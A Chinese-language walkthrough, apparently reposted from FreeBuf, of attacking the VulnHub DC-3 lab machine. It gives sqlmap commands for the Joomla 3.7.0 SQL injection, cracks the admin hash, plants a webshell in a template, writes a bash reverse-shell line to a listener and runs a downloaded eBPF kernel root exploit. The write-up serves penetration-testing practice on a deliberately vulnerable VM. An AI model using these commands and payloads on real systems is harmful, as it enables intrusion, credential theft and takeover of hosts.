首页 » 网站推广 » php实战dpf技巧_vulnhub DC3靶机实战

php实战dpf技巧_vulnhub DC3靶机实战

访客 2024-12-03 0

扫一扫用手机浏览

文章目录 [+]

0X01 环境支配0X02 信息网络0X03 Getshell0X04 提权0X05 总结

0X01 环境支配

1.下载地址

php实战dpf技巧_vulnhub DC3靶机实战

https://www.vulnhub.com/entry/dc-32,312/

php实战dpf技巧_vulnhub DC3靶机实战
(图片来自网络侵删)

安装好并将网络置为NET模式

0X02 信息网络

1.主机创造

arpscan -l

2.端口网络

nmap -sS 192.168.190.130

创造存在80端口,可以进行查看

3.目录扫描

python3 dirsearch.py -u http://192.168.190.130/

4.查看网站配置

是一个名叫Joomla的CMS,可进行搜索利用

0X03 Getshell

1.漏洞创造

首先在kali上安装joomscansudo apt-get install joomscan

joomscan --url http://192.168.190.130

扫描到网页的版本是3.7.0

2.漏洞利用

searchsploit Joomla 3.7.0

可以看到存在sql注入

再查看利用方法

cat /usr/share/exploitdb/exploits/php/webapps/42033.txt

sqlmap -u "http://192.168.190.130/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] #爆破所有数据库

sqlmap -u "http://192.168.190.130/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables -p list[fullordering] #爆破joomladb数据库下的所有表名

sqlmap -u "http://192.168.190.130/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T "#__users" --columns -p list[fullordering] #爆破joomladb数据库下的#__users下的所有列

sqlmap -u "http://192.168.190.130/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" -C "id,username,password" --dump -p list[fullordering]#爆破joomladb数据库下的#__users下的id,username,password值

找到了账号密码admin/$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu

3.密码爆破

普通的md5无法解密

新建一个txt文件,进行破解vim mm.txtcat mm.txtjohn mm.txt

账号密码 :admin/snoopy成功登录后台

4.getshell

点击后台中的模板文件进行添加一句话

找到网站首页index.php文件,添加自己的一句话

访问一下http://192.168.190.130/templates/beez3/index.php

蚁剑连接,连接成功

5.反弹shell

kali开启监听nc -lvnp 5678

error.php文件写入<?phpsystem("bash -c 'bash -i >& /dev/tcp/192.168.190.128/5678 0>&1' ");?>

考试测验访问error.php文件

反弹shell成功

0X04 提权

1.当前权限

whoami

查看内核版本信息/系统版本信息uname -acat /etc/issue

2.查找漏洞

searchsploit ubuntu 16.04

终极选定,path 为39772.txt的漏洞,将其下载到本地桌面cp /usr/share/exploitdb/exploits/linux/local/39772.txt /home/kali/Desktop/打开文件并查看详细的利用方法cd /home/kali/Desktop/lscat 39972.txt

文件末了有exp下载链接

3.漏洞提权

以及蚁剑链接,可以通过下载到本地然后进行利用下载链接https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip

unzip 39772.zip //解压压缩包cd 39772.zip //切换到解压好的目录下lstar -xvf exploit.tar //解压提权压缩包cd ebpf_mapfd_doubleput_exploit //切换目录

3.开始提权

./compile.shls./doubleput //实行提权文件

whoami //root提权成功cd /rootlscat the-flag.txt

0X05 总结

1.首先网络信息,真实ip,端口,网站目录,网站支配部件等2.已知cms利用手腕,查识破绽,3.利用漏洞得到后台账号密码4.模板修正getshell5.查看权限,根据系统内核版本进行提权6.提权成功查看flag

本文作者:铁壁阿童木Y, 转载请注明来自FreeBuf.COM

相关文章

介绍直播新纪元,轻松进入直播的五大步骤

随着互联网技术的飞速发展,直播行业在我国逐渐崛起,越来越多的人选择通过直播这一新兴媒介展示自己、分享生活、传递价值。对于许多新手来...

网站推广 2025-01-03 阅读1 评论0

介绍相机美颜原理,科技与美学的完美结合

随着科技的发展,智能手机的摄像头功能日益强大,美颜相机成为了许多人拍照的首选。美颜相机不仅满足了人们对于美的追求,更在视觉上给人带...

网站推广 2025-01-03 阅读1 评论0

介绍磁铁的制造,科学与艺术的完美结合

磁铁,一种神秘的物质,自古以来就吸引了无数人的目光。它不仅具有独特的磁性,还能在工业、医疗、科研等领域发挥重要作用。磁铁是如何制造...

网站推广 2025-01-03 阅读1 评论0

介绍电瓶激活方法,让电池焕发新生

随着科技的不断发展,电动汽车逐渐成为人们出行的首选。而电瓶作为电动汽车的核心部件,其性能直接影响着车辆的续航里程和行驶体验。新购买...

网站推广 2025-01-03 阅读1 评论0